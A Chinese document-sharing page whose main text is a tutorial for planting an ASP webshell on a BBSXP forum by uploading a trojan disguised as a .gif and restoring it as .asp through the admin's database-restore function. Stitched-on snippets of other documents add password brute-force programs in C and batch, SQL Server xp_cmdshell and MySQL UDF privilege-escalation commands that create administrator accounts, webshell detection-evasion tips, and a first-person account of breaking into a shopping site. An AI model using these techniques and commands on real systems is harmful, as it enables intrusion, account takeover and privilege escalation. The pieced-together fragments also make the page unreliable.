文档库 最新最全的文档下载
当前位置:文档库 › 获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限的截图0
获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限

一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。

二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。

在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。

三、实验步骤

1、IE浏览器中输入https://www.wendangku.net/doc/129628197.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。

(1)以管理员身份登录网站前台,如图1。

图1

(2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

图2

(3)出现图4所示界面后,点击“数据管理”,进入ACCESS数据库管理。

图4

(4)在图5界面中点击“ACCESS数据库”,记下此时IE浏览器地址栏中的URL地址为

https://www.wendangku.net/doc/129628197.html,/bbsxp1/admin.asp。

图5

(5)在网站前台找能上传.gif的网页:回到https://www.wendangku.net/doc/129628197.html,/bbsxp1页面,并以管

理员身份登录前台(输入前台管理员用户名、口令)。然后,在图6界面中点击“上传图像”,

将我们事先已经生成的脚本型网页木马up.asp上传至网站,但是屏幕提示上不成功,如图7。

图6

图7

(6)回到刚才的上传页面,将up.asp重命名为up.gif,在图8界面中记下头像URL后,点

击“确认”钮,则上传成功,出现图9的提示。

图8

图9

(7)回到https://www.wendangku.net/doc/129628197.html,/bbsxp1/admin.asp页面,如图10。在“恢复数据库”框架中---->“备份的数据库路径”---->输入images/upface/1.gif;在“恢复数据库”框架中---->

“数据库路径”---->输入database/pc888.asp,并点击“恢复”钮,如图11。

图10

(8)出现报错,如图12。

图12

(9)回到图11界面中,将“恢复数据库”框架中的“数据库路径”修改为

“database/pctest888.ASP”,再点击“恢复钮”,如图13。

(10)屏幕提示恢复成功,如图14。

图14

(11)IE中输入:https://www.wendangku.net/doc/129628197.html,/bbsxp1/database/pctest888.asp,出现图15的界面,这正是up.asp脚本木马的运行界面。这就表明一个上传的webshell已经出现在我们面

前。

图15

暴力破解程序

#include #include using namespace std; //破解当前密码,只适合4位纯数字的密码(异或加密)//// ////思想是,首先将原文用密码异或加密(异或加密特点是原文异或得到密文,密文异或得到原文,即解密,即原文异或加密两次便得到原文), ////将得到的密文传入破解密码函数,异或解密成原文,如原文与实际原文相同,则表示密码正解,即破解成功,否则继续对比查找。/// string strp(const string & str,const string & strpw); string pjpw(const string & str,const string & strpw); int main() { string s1="this is a book."; string pass="9987"; string mw=strp(s1,pass);//原文加密并赋值给mw cout<<"密文是:"<

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.wendangku.net/doc/129628197.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc

常见的webshell检测方法及绕过思路

常见的webshell检测方法及绕过思路 一句话webshell基本结构: 两个步骤:数据的传递、执行所传递的数据 数据的传递&绕过检测 对于数据的传递,我们通常的做法是$_GET/$_POST/$_SERVER/$_COOKIE等获取客户端数据,但是这类关键词直接出现的话,可以很容易回溯到,我们有以下集中方案来解决: 1.利用本身所在的框架 2.利用变种:${“_G”.”ET”}。不过这种不过这种方式也有自身的缺点,可以跟踪“${”;不过这种跟踪又可以通过“$/*a*/{”这种方式绕过(当然其又有被跟踪的可能性)。 3.使用其他数据获取方式来获取数据,譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。 4.人为构造语言缺陷或应用漏洞,并且这种缺陷是不易察觉的,譬如伪造管理 员session等。 数据执行&绕过检测 对于数据执行,我们通常使用的函数或方式有:eval、create_function、``、exec、preg_replace等。当然这类关键词如果直接出现的话,我们的自动化webshell检测脚本可以很轻易的进行识别,目前看我们可以绕过检测的方案较少: 1、通过$a()这种方式来执行函数。不过这种方式也有自身规律在里面,有很多扫描器已经内置了“$.*($.*”这种规则,同样我们可以通过$a/*a*/()这种方式以及相应的变通方式来绕过。(当然其又有被跟踪的可能性) 2、尝试去找到不在黑名单中的函数,或者极其常见的函数。 两句话webshell $a = $_GET[‘a’];eval($a);

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.wendangku.net/doc/129628197.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

BurpSuite爆破密码

Burp Suite--- Intruder小技巧 作者:小冰50421961[AT] QQ [Dot] com 0x00 题外话 最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版,太激动了!为此表示感谢,所以才有了下文。O(∩_∩)O哈哈~废话不多说,进入正题。 0x01 Intruder—暴力破解 安装要求: Java环境下载地址: https://www.wendangku.net/doc/129628197.html,/j2se/downloads.html Burp Suite下载地址: https://www.wendangku.net/doc/129628197.html,/burp/download.html 入门: 安装完成后可以双击可执行的JAR文件,如果不工作,你可以运行在命令提示符或终端输入。命令: Java –jar burpsuite_v1.4.jar 上篇文章对于burp的基本设置,已经说了很明了了,在这我就只提下就行咯。(*^__^*) 嘻嘻…… 配置过程如下: 代理端口配置如下图: 浏览器的配置如下图:

然后把拦截(intercept)功能关闭,因为我们这里不需要进行数据拦截 目标:登陆页面 思路过程:寻找登陆错误关键字—进行暴力破解 打开我们的目标如下图:

我们随意填写账户密码进行登陆,以此获取到登陆的错误信息如下图: 然后返回burp看提交和返回数据信息如下图:

发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑!其实细心的童鞋会发现我上图我所标注的地方,HTTP 状态码302—重定向到另外一个url,我们看看第二个url 返回的内容如下图:

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.wendangku.net/doc/129628197.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.wendangku.net/doc/129628197.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

关于mysql提权方法总结

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统(rdbms),mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言(sql)进行数据库管理。那么对于mysql提权的方法,站长们是否了解呢?专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨! mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项, 如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values (CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

暴力破解密码C语言

#include"stdio.h" #include"time.h" #include"stdlib.h" #include"malloc.h" #include"string.h" int main() { char a[10],b[]={"000000"},c[]={"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU VWXYZ"}; int d[6]; clock_t start,finish; double TheTimes; do { printf("请输入六位密码:"); gets(a); if(a[6]=='\0') { break; } printf("ERROR\n" ); } while(1); start=clock(); while(1) { for(d[5]=0;d[5]<64;d[5]++) { b[5]=c[d[5]]; for(d[4]=0;d[4]<64;d[4]++) { b[4]=c[d[4]]; for(d[3]=0;d[3]<64;d[3]++) { b[3]=c[d[3]]; for(d[2]=0;d[2]<64;d[2]++) { b[2]=c[d[2]]; for(d[1]=0;d[1]<64;d[1]++) { b[1]=c[d[1]]; for(d[0]=0;d[0]<64;d[0]++)

{ b[0]=c[d[0]]; if(strcmp(a,b)==0) { printf("破解密码得:"); puts(b); finish=clock(); TheTimes=(double)((finish-start)/CLOCKS_PER_SEC); printf("用时%f秒。\n",TheTimes); return(0); } } } } } } } } return(0); }

一次简单但又完整的先拿shell后提权的经历

. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.wendangku.net/doc/129628197.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.wendangku.net/doc/129628197.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了

连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件:

发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的,

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.wendangku.net/doc/129628197.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。

网站拿webshell_经典全集

今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手. 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到的方法进行了总结和归纳,大体情况有以下十大方面。 注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。 一、直接上传获得 二、添加修改上传类型 三、利用后台管理功能写入 四、利用后台管理向配置文件写 五、利用后台数据库备份及恢复获得 六、利用数据库压缩功能 七、系统 八、系统 九、论坛从后台到的三种方式 本帖隐藏的内容需要回复才可以浏览 一、直接上传获得 这种对和的一些程序比较常见,就是其中一例,直接在心情图标管理上传类型,虽然没有提示,其实已经成功了,上传的文件应该是下,前一阵子的联众游戏站和网易的系统漏洞就可以直接上传文件。文件名是原来的文件名,后台可以可以直接上传文件,上传的文件路径有提示。以及一年前十分流行的漏洞(动网和、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传到网站任意可写目录中,从而拿到网站的管理员控制权限。 二、添加修改上传类型 现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,后台可以添加类型,的后台也可添加类型,通过修改后我们可以直接上传后缀的了,还有一种情况是过滤了,可以添加的文件类型来上传获得。系统的后台,我们可以添加的上传类型,这是的一个特性,最后的哪个只要不是已知的文件类型即可,会将作为来正常运行,从而也可成功拿到。后台获得方法是:在上传类型中增加,注意,后面是有个空格的,然后在前台上传马,当然也要在后面加个空格! 三、利用后台管理功能写入

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我来,看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里, 那么就会用到ftp,服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写~ 好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接~ 好的,还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限,那我们就 把后门(server.exe)传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

【CN109905385A】一种webshell检测方法、装置及系统【专利】

(19)中华人民共和国国家知识产权局 (12)发明专利申请 (10)申请公布号 (43)申请公布日 (21)申请号 201910123769.5 (22)申请日 2019.02.19 (71)申请人 中国银行股份有限公司 地址 100818 北京市西城区复兴门内大街1 号 (72)发明人 俞学浩 蔡传智 王倩  (74)专利代理机构 北京三友知识产权代理有限 公司 11127 代理人 李辉 (51)Int.Cl. H04L 29/06(2006.01) G06F 17/27(2006.01) (54)发明名称 一种webshell检测方法、 装置及系统(57)摘要 本说明书实施例公开了一种webshell检测 方法、装置及系统,所述方法包括获取待检测网 页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节 码数据进行识别,获得所述待检测网页的 webshell检测结果,其中,所述监督学习算法包 括对确定为webshell的PHP脚本数据以及确定为 正常的PHP脚本数据对应的第二中间字节码数据 进行训练得到的webshell检测模型。利用本说明 书各实施例,可以提高PHP webshell检测的准确 性。权利要求书2页 说明书13页 附图3页CN 109905385 A 2019.06.18 C N 109905385 A

权 利 要 求 书1/2页CN 109905385 A 1.一种webshell检测方法,其特征在于,包括: 获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2.根据权利要求1所述的方法,其特征在于,所述利用构建的监督学习算法对所述第一中间字节码数据进行识别,包括: 基于预设的分词库,利用TF-IDF算法对所述第一中间字节码数据进行特征提取,获得所述待检测网页的特征数据,其中,所述分词库包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行分词处理后获得分词数据; 利用构建的监督学习算法对所述待检测网页的特征数据进行识别。 3.根据权利要求2所述的方法,其特征在于,所述利用TF-IDF算法对所述第一中间字节码数据进行特征提取,包括: 将所述第一中间字节码数据进行分词处理,获得所述待检测网页的PHP脚本数据对应的第一分词集合; 利用TF-IDF算法计算所述分词库中每个词相对所述第一分词集合的TF-IDF值; 将所述TF-IDF值按照相应的词在分词库中的位置进行一一对应,获得由TF-IDF值组成的向量,将该向量作为所述待检测网页的特征向量。 4.根据权利要求2或3所述的方法,其特征在于,所述预设的分词库采用下述方式构建: 获取确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据,获得样本集合; 将所述样本集合中的各脚本数据转换成中间字节码数据,获得各脚本数据对应的第二中间字节码数据; 对所述第二中间字节码数据进行分词处理,获得各脚本数据对应的第二分词集合; 将所述第二分词集合进行融合处理,获得分词库。 5.根据权利要求4所述的方法,其特征在于,所述webshell检测模型采用下述方式训练得到: 利用TF-IDF算法计算所述分词库中每个词相对所述第二分词集合的TF-IDF值,获得相应脚本数据的特征向量; 利用监督学习算法对所述确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据所对应的特征向量进行学习,获得webshell检测模型。 6.根据权利要求1所述的方法,其特征在于,所述待检测网页的webshell检测结果包括待检测网页是否属于webshell网页或者属于webshell网页的概率。 7.一种webshell检测装置,其特征在于,所述装置包括: 数据获取模块,用于获取待检测网页的PHP脚本数据对应的第一中间字节码数据; 检测模块,用于利用构建的监督学习算法对所述第一中间字节码数据进行识别,获得所述待检测网页的webshell检测结果,其中,所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2

写Bat暴力破解系统密码

原理: 1、字典:for /f %i in (字典文件) do net use 主机ipc$ "%i" /user:"用户" 2、数字:for /l %i in (start,step,end) do net use 主机ipc$ "%i" /user:"用户" 实现: 将下面文件存为start.bat: @echo off echo ---------------------------------------- >>c:pwd.txt date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解结果:>>c:pwd.txt if "%6"=="1" goto shit2 :shit1 start "正在破解....." /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit :shit2 start "正在破解......" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 :quit 将下面文件存为test.bat: net use %1ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL% :answer0 echo 远程主机:"%1" >>c:pwd.txt echo 用户:"%3" >>c:pwd.txt

echo 密码:%2 >>c:pwd.txt net use %1ipc$ /delet date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解完成。。。。zypcc >>c:pwd.txt exit :answer2 用法如下: 1、如果用字典破解:start.bat 字典文件路径及名称主机用户名 2、如果用数字破解: start.bat 起始数步长结束数主机用户名1

最全的WEBSHELL提权方法总结

